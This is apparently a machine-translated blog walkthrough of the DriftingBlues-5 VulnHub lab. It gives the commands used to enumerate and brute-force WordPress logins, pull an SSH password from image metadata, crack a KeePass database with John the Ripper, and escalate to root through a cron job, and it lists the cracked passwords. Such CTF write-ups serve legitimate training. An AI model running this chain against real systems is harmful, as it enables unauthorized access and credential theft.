After reading this article, I will teach you to play with the penetration test target vulnhub - drivetingblues-5

Vulnhub Introduction to target machine ：

vulnhub It is a comprehensive shooting range providing various vulnerability platforms , A variety of virtual machines can be downloaded , Local VM Open the can , Complete the penetration test like a game 、 Raise the right 、 Exploit 、 Code audit and other interesting actual combat .

Update this issue Vulnhub DriftingBlues series I still found it as usual FLAG that will do , May be biased towards CTF spot .

Vulnhub Target download ：

Official website address ：https://www.vulnhub.com/entry/driftingblues-5,662/

Vulnhub Detailed explanation of target vulnerability ：

Preface ： Here again DriftingBlues-2 The problem of You need to configure your own network card

Specific reference ：https://blog.csdn.net/Aluxian_/article/details/125095660?spm=1001.2014.3001.5501

①： information gathering ：

kali Use in netdiscover Discover the host

Infiltration machine ：kali IP ：192.168.205.133 Drone aircraft IP ：192.168.205.142

Use command ：nmap -sS -A -T4 -n 192.168.205.142

Discovery turned on 80 Port and 22 port First visit 80 Port discovery yes CMS System yes wordpress Use dirb Scan the background directory ：/wp-admin/user

②： Brute force ：

Now that you know the backstage Now need Know the account and password Log in Use wpscan This tool enumerates （ Found some users ）

wpscan --url http://192.168.205.142 -e u 

Then we use tools cewl Make one called passwd.txt Dictionary .

cewl -m 3 -w passwd.txt http://192.168.205.142 

wpscan --url http://192.168.205.142/ -e u --passwords passwd.txt

Finally, I got the account and password as ：gill /interchangeable

After logging in successfully, I found a picture that the front end did not have It feels suspicious Download it

wget http://192.168.205.142/wp-content/uploads/2021/02/dblogo.png 

Here is a tool exiftool newest kaili There is no need to install one This tool is used for EXIF Information analysis

apt-get Install exiftool

exiftool  /root/ desktop /dblogo.png  

Finally, I found the hidden ssh password ：59583hello

③：ssh Log in ：

Try logging in , Found login successful ！！！ Got the first flag

ssh [email protected]192.168.205.142

④：KDBX File password explosion ：

And found a keyfile.kdbx file （ The first time I encountered such a file ）

What is? DKBX file ？https://www.solvusoft.com/zh-cn/file-extensions/file-extension-kdbx/

python -m SimpleHTTPServer 80 # Open temporary web service    But there was an error 

Let's try another way ： Use scp This command

scp [email protected]192.168.205.142:/home/gill/key* /root

take keyfile.kdbx Change the content to john Supported format ：keepass2john keyfile.kdbx > Keepasshash.txt

In the use of john Crack the code ：john --wordlist=/usr/share/wordlists/rockyou.txt Keepasshash.txt

Finally, the password was cracked to ：porsiempre

⑤： Timing right raising ：

open ：https://app.keeweb.info/

Six passwords were found ：

2real4surreal 
buddyretard
closet313
exalted
fracturedocean
zakkwylde

Try using these passwords to get in But no useful information was found

Target download pspy64：https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

Use WinSCP hold pspy64 To the target plane /home/gill/ in

chmod 777 pspy64 # Grant authority 
./pspy64  # Execute the script 

Found the root directory , Every minute key.sh Script file for

Use keyfile.kdbx The name in the file , New file fracturedocean Then create the correct file name You'll get a new file rootcreds.txt

If there is cat I found out root Account password of ！！！

⑥： obtain flag：

So far, we have obtained all flag, End of penetration test .

Vulnhub Target penetration summary ：

1.cewl Generate dictionaries and wpscan Use of tools for brute force cracking
2.Exiftool This tool is used for EXIF Information analysis ( It is the first time to understand the use and function of this tool )
3..kdbx File password cracking （ New knowledge , It takes a lot of time to do it for the first time ）
4. If it cannot be opened temporarily web service have access to scp This command （ Very easy to use ！！）
5. Decrypt keepass Database access password （ It doesn't work But it is also the first time to understand New knowledge ）
6. Timing right raising Download script pspy64 see establish key Document rights

DriftingBlues The fifth target aircraft of the series will be updated in the future , It's not easy to create I hope that's helpful If you like it, please give me one button three times Your happiness is my greatest happiness ！！